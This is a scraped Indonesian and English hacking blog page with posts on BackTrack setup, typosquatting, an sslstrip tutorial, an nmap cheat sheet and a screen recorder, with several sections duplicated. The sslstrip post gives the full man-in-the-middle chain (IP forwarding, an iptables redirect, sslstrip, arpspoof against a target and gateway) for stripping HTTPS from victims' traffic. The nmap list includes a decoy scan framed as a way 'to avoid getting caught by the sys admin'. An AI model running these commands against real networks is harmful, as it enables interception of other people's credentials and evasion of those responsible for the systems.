Codeearl - Security Info
Hacking Security, Exploit Database, SQL Injectiont, Shell, Vulnerability Reports, Remote Exploits, Remote Control, Local Exploits, Security Articles, Security News, Tutorials And More Hacking
Sejarah Pers
#///////////////////////////////////////////////////////////////// #// - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - #// Regards : c0d334rl | Qye #// - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - #// GENERATED ON : 2012-12-01 | 00:04 PM #/////////////////////////////////////////////////////////////////
What to do after install backtrack
1. apt-get update
2. apt-get upgrade
3. apt-get install update-manager
4. apt-get install synaptic
*Ubuntu-Software-Center locate : Applications=>Ubuntu-software-Center
5. apt-get install software-center
6. sudo apt-get install openoffice.org => for open office
7. Install Ubuntu Tweak
* add-apt-repository ppa:ubuntu-tweak-testing/ppa && sudo apt-get update
* sudo apt-get install ubuntu-tweak
8. Install Driver AMD
* wget -c http://www2.ati.com/drivers/linux/amd-driver-installer-12-1-x86.x86_64.run => download to home folder
* chmod +x amd-driver-installer-12-1-x86.x86_64.run => chame permission
* ./amd-driver-installer-12-1-x86.x86_64.run => run or setup
2. apt-get upgrade
3. apt-get install update-manager
4. apt-get install synaptic
*Ubuntu-Software-Center locate : Applications=>Ubuntu-software-Center
5. apt-get install software-center
6. sudo apt-get install openoffice.org => for open office
7. Install Ubuntu Tweak
* add-apt-repository ppa:ubuntu-tweak-testing/ppa && sudo apt-get update
* sudo apt-get install ubuntu-tweak
8. Install Driver AMD
* wget -c http://www2.ati.com/drivers/linux/amd-driver-installer-12-1-x86.x86_64.run => download to home folder
* chmod +x amd-driver-installer-12-1-x86.x86_64.run => chame permission
* ./amd-driver-installer-12-1-x86.x86_64.run => run or setup
#///////////////////////////////////////////////////////////////// #// - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - #// Regards : c0d334rl | Qye #// - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - #// GENERATED ON : 2012-12-01 | 00:04 PM #/////////////////////////////////////////////////////////////////
Pembajakan url atau Typosquatting
Typosquatting, juga disebut pembajakan URL, merupakan bentuk cybersquatting , dan mungkin brandjacking yang bergantung pada kesalahan seperti kesalahan ketik yang dibuat oleh pengguna Internet ketika memasukkan sebuah alamat website ke browser web . Haruskah pengguna sengaja memasukkan alamat website yang salah, mereka dapat menyebabkan sebuah situs alternatif yang dimiliki oleh cybersquatter
Ada beberapa alasan yang berbeda untuk typosquatters membeli salah ketik domain:
- Dalam rangka untuk mencoba dan menjual typo domain kembali ke pemilik merek
- "Taman" typo domain dan membuat pay-per-klik pendapatan dari navigasi langsung miss-mantra dari domain dimaksudkan
- Untuk mengarahkan lalu lintas ke typo-pesaing
- Untuk mengarahkan typo-lintas kembali ke merek itu sendiri, tetapi melalui link afiliasi, sehingga mendapatkan komisi dari program afiliasi pemilik merek. Ini "typo domain afiliasi" adalah salah satu skema yang paling merusak finansial seperti sifon keuntungan dari merek yang sah untuk lalu lintas / pelanggan bahwa merek akan mendapatkan pula telah typo domain tidak ada.
- Sebagai phishing skema untuk meniru situs merek, sementara mencegat password yang pengunjung masuk unsuspectingly
- Untuk menginstal drive-by malware atau menghasilkan pendapatan adware ke perangkat pengunjung '
- Untuk panen pesan e-mail misaddressed keliru dikirim ke domain typo
- Untuk memblokir penggunaan jahat dari typo domain oleh orang lain
#///////////////////////////////////////////////////////////////// #// - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - #// Regards : c0d334rl | Qye #// - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - #// GENERATED ON : 2012-12-01 | 00:04 PM #/////////////////////////////////////////////////////////////////
Sslstrip
Tool ini memberikan demonstrasi serangan pengupasan HTTPS. Tool akan membajak lalu lintas HTTP pada jaringan, perhatikan HTTPS link dan pengalihan, kemudian peta link tersebut menjadi baik HTTP link mirip atau link HTTPS homograf-sama. Ini juga mendukung mode untuk memasok favicon yang terlihat seperti ikon kunci, tebang pilih, dan sesi penolakan.
baiklah.. sekarang yang di perlukan adalah sslstrip-0.9.tar.gz yamg bisa anda download di sini
setelah di download extract file tersebut dengan menggunakan perintah tar zxvf sslstrip-0.9.tar.gz seperti gambar di bawah ini.
setelah itu masuk ke dalam folder extract tadi dengan perintah berikut :
untuk penginstalan, pastikan di dalam system operasi anda telah terinstal python dan berikan perintah berikut :
Menjalankan sslstrip
selamat mencoba dan kembangkan sendiri sayap mu di udara.
regard : code@earl:~# A.k.a c0d334rl /codeearl
baiklah.. sekarang yang di perlukan adalah sslstrip-0.9.tar.gz yamg bisa anda download di sini
setelah di download extract file tersebut dengan menggunakan perintah tar zxvf sslstrip-0.9.tar.gz seperti gambar di bawah ini.
progress extract sslstrip-0.9.tar.gz |
setelah itu masuk ke dalam folder extract tadi dengan perintah berikut :
code@earl:~# cd sslstrip-0.9
untuk penginstalan, pastikan di dalam system operasi anda telah terinstal python dan berikan perintah berikut :
code@earl:~/sslstrip-0.9# python ./setup.py install
output install |
Menjalankan sslstrip
- echo "1"> / proc/sys/net/ipv4/ip_forward
- iptables-t nat-A PREROUTING-p tcp - destination-port 80-j REDIRECT - to-port <listenPort> "Mengatur iptables untuk mengarahkan traffic HTTP ke sslstrip"
- sslstrip.py-l <listenPort> "Jalankan sslstrip"
- arpspoof-i <interface>-t <targetIP> <gatewayIP> "Jalankan arpspoof untuk meyakinkan jaringan mereka harus mengirimkan lalu lintas mereka kepada Anda"
selamat mencoba dan kembangkan sendiri sayap mu di udara.
regard : code@earl:~# A.k.a c0d334rl /codeearl
#///////////////////////////////////////////////////////////////// #// - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - #// Regards : c0d334rl | Qye #// - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - #// GENERATED ON : 2012-12-01 | 00:04 PM #/////////////////////////////////////////////////////////////////
Nmap Cool Scanning Technique
1) Get info about remote host ports and OS detection
Code: nmap -sS -P0 -sV -O <target>
Where < target > may be a single IP, a hostname or a subnet
-sS TCP SYN scanning (also known as half-open, or stealth scanning)
-P0 option allows you to switch off ICMP pings.
-sV option enables version detection
-O flag attempt to identify the remote operating system
Other option:
-A option enables both OS fingerprinting and version detection
-v use -v twice for more verbosity.
code : nmap -sS -P0 -A -v < target >
2) Get list of servers with a specific port open
Code: nmap -sT -p 80 -oG – 192.168.1.* | grep open
Change the -p argument for the port number. See “man nmap” for different ways to specify address ranges.
3) Find all active IP addresses in a network
Code: nmap -sP 192.168.0.*
There are several other options. This one is plain and simple.
Another option is:
Code: nmap -sP 192.168.0.0/24
for specific subnets
4) Ping a range of IP addresses
Code: nmap -sP 192.168.1.100-254
nmap accepts a wide variety of addressing notation, multiple targets/ranges, etc.
5) Find unused IPs on a given subnet
Code: nmap -T4 -sP 192.168.2.0/24 && egrep “00:00:00:00:00:00″ /proc/net/arp
6) Scan for the Conficker virus on your LAN ect.
Code: nmap -PN -T4 -p139,445 -n -v –script=smb-check-vulns –script-args safe=1 192.168.0.1-254
replace 192.168.0.1-256 with the IP’s you want to check.
7) Scan Network for Rogue APs.
Code: nmap -A -p1-85,113,443,8080-8100 -T4 –min-hostgroup 50 –max-rtt-timeout 2000 –initial-rtt-timeout 300 –max-retries 3 –host-timeout 20m –max-scan-delay 1000 -oA wapscan 10.0.0.0/8
I’ve used this scan to successfully find many rogue APs on a very, very large network.
8) Use a decoy while scanning ports to avoid getting caught by the sys admin
Code: nmap -sS 192.168.0.10 -D 192.168.0.2
Scan for open ports on the target device/computer (192.168.0.10) while setting up a decoy address (192.168.0.2). This will show the decoy ip address instead of your ip in targets security logs. Decoy address needs to be alive. Check the targets security log at /var/log/secure to make sure it worked.
9) List of reverse DNS records for a subnet
Code: nmap -R -sL 209.85.229.99/27 | awk ‘{if($3==”not”)print”(“$2″) no PTR”;else print$3″ is “$2}’ | grep ‘(‘
This command uses nmap to perform reverse DNS lookups on a subnet. It produces a list of IP addresses with the corresponding PTR record for a given subnet. You can enter the subnet in CDIR notation (i.e. /24 for a Class C)). You could add “–dns-servers x.x.x.x” after the “-sL” if you need the lookups to be performed on a specific DNS server. On some installations nmap needs sudo I believe. Also I hope awk is standard on most distros.
10) How Many Linux And Windows Devices Are On Your Network
Code: nmap -F -O 192.168.0.1-255 | grep “Running: ” > /tmp/os; echo “$(cat /tmp/os | grep Linux | wc -l) Linux device(s)”; echo “$(cat /tmp/os | grep Windows | wc -l) Window(s) devices”
Code: nmap -sS -P0 -sV -O <target>
Where < target > may be a single IP, a hostname or a subnet
-sS TCP SYN scanning (also known as half-open, or stealth scanning)
-P0 option allows you to switch off ICMP pings.
-sV option enables version detection
-O flag attempt to identify the remote operating system
Other option:
-A option enables both OS fingerprinting and version detection
-v use -v twice for more verbosity.
code : nmap -sS -P0 -A -v < target >
2) Get list of servers with a specific port open
Code: nmap -sT -p 80 -oG – 192.168.1.* | grep open
Change the -p argument for the port number. See “man nmap” for different ways to specify address ranges.
3) Find all active IP addresses in a network
Code: nmap -sP 192.168.0.*
There are several other options. This one is plain and simple.
Another option is:
Code: nmap -sP 192.168.0.0/24
for specific subnets
4) Ping a range of IP addresses
Code: nmap -sP 192.168.1.100-254
nmap accepts a wide variety of addressing notation, multiple targets/ranges, etc.
5) Find unused IPs on a given subnet
Code: nmap -T4 -sP 192.168.2.0/24 && egrep “00:00:00:00:00:00″ /proc/net/arp
6) Scan for the Conficker virus on your LAN ect.
Code: nmap -PN -T4 -p139,445 -n -v –script=smb-check-vulns –script-args safe=1 192.168.0.1-254
replace 192.168.0.1-256 with the IP’s you want to check.
7) Scan Network for Rogue APs.
Code: nmap -A -p1-85,113,443,8080-8100 -T4 –min-hostgroup 50 –max-rtt-timeout 2000 –initial-rtt-timeout 300 –max-retries 3 –host-timeout 20m –max-scan-delay 1000 -oA wapscan 10.0.0.0/8
I’ve used this scan to successfully find many rogue APs on a very, very large network.
8) Use a decoy while scanning ports to avoid getting caught by the sys admin
Code: nmap -sS 192.168.0.10 -D 192.168.0.2
Scan for open ports on the target device/computer (192.168.0.10) while setting up a decoy address (192.168.0.2). This will show the decoy ip address instead of your ip in targets security logs. Decoy address needs to be alive. Check the targets security log at /var/log/secure to make sure it worked.
9) List of reverse DNS records for a subnet
Code: nmap -R -sL 209.85.229.99/27 | awk ‘{if($3==”not”)print”(“$2″) no PTR”;else print$3″ is “$2}’ | grep ‘(‘
This command uses nmap to perform reverse DNS lookups on a subnet. It produces a list of IP addresses with the corresponding PTR record for a given subnet. You can enter the subnet in CDIR notation (i.e. /24 for a Class C)). You could add “–dns-servers x.x.x.x” after the “-sL” if you need the lookups to be performed on a specific DNS server. On some installations nmap needs sudo I believe. Also I hope awk is standard on most distros.
10) How Many Linux And Windows Devices Are On Your Network
Code: nmap -F -O 192.168.0.1-255 | grep “Running: ” > /tmp/os; echo “$(cat /tmp/os | grep Linux | wc -l) Linux device(s)”; echo “$(cat /tmp/os | grep Windows | wc -l) Window(s) devices”
#///////////////////////////////////////////////////////////////// #// - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - #// Regards : c0d334rl | Qye #// - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - #// GENERATED ON : 2012-12-01 | 00:04 PM #/////////////////////////////////////////////////////////////////
Record My Desktop
Apa yang di maksud dengan Record My Desktop..??
Record My Desktop adalah sebuah tool dimana kita dapat merekam kegiatan yang ada pada desktop yang sedang kita gunakan....!!
Jika Anda telah menginstal program, Anda juga harus dapat mengaksesnya menjalankan perintah berikut dalam terminal:
code@earl:~# recordmydesktop
atau
Applications > Sound & Vidio > gtk-recordMyDesktop
untuk menginstal nya cukup ketikkan pada terminal dengan perintah berikut :
code@earl:~# apt-get install gtk-recordmydesktop
Record My Desktop adalah sebuah tool dimana kita dapat merekam kegiatan yang ada pada desktop yang sedang kita gunakan....!!
Jika Anda telah menginstal program, Anda juga harus dapat mengaksesnya menjalankan perintah berikut dalam terminal:
code@earl:~# recordmydesktop
atau
Applications > Sound & Vidio > gtk-recordMyDesktop
untuk menginstal nya cukup ketikkan pada terminal dengan perintah berikut :
code@earl:~# apt-get install gtk-recordmydesktop
#///////////////////////////////////////////////////////////////// #// - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - #// Regards : c0d334rl | Qye #// - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - #// GENERATED ON : 2012-12-01 | 00:04 PM #/////////////////////////////////////////////////////////////////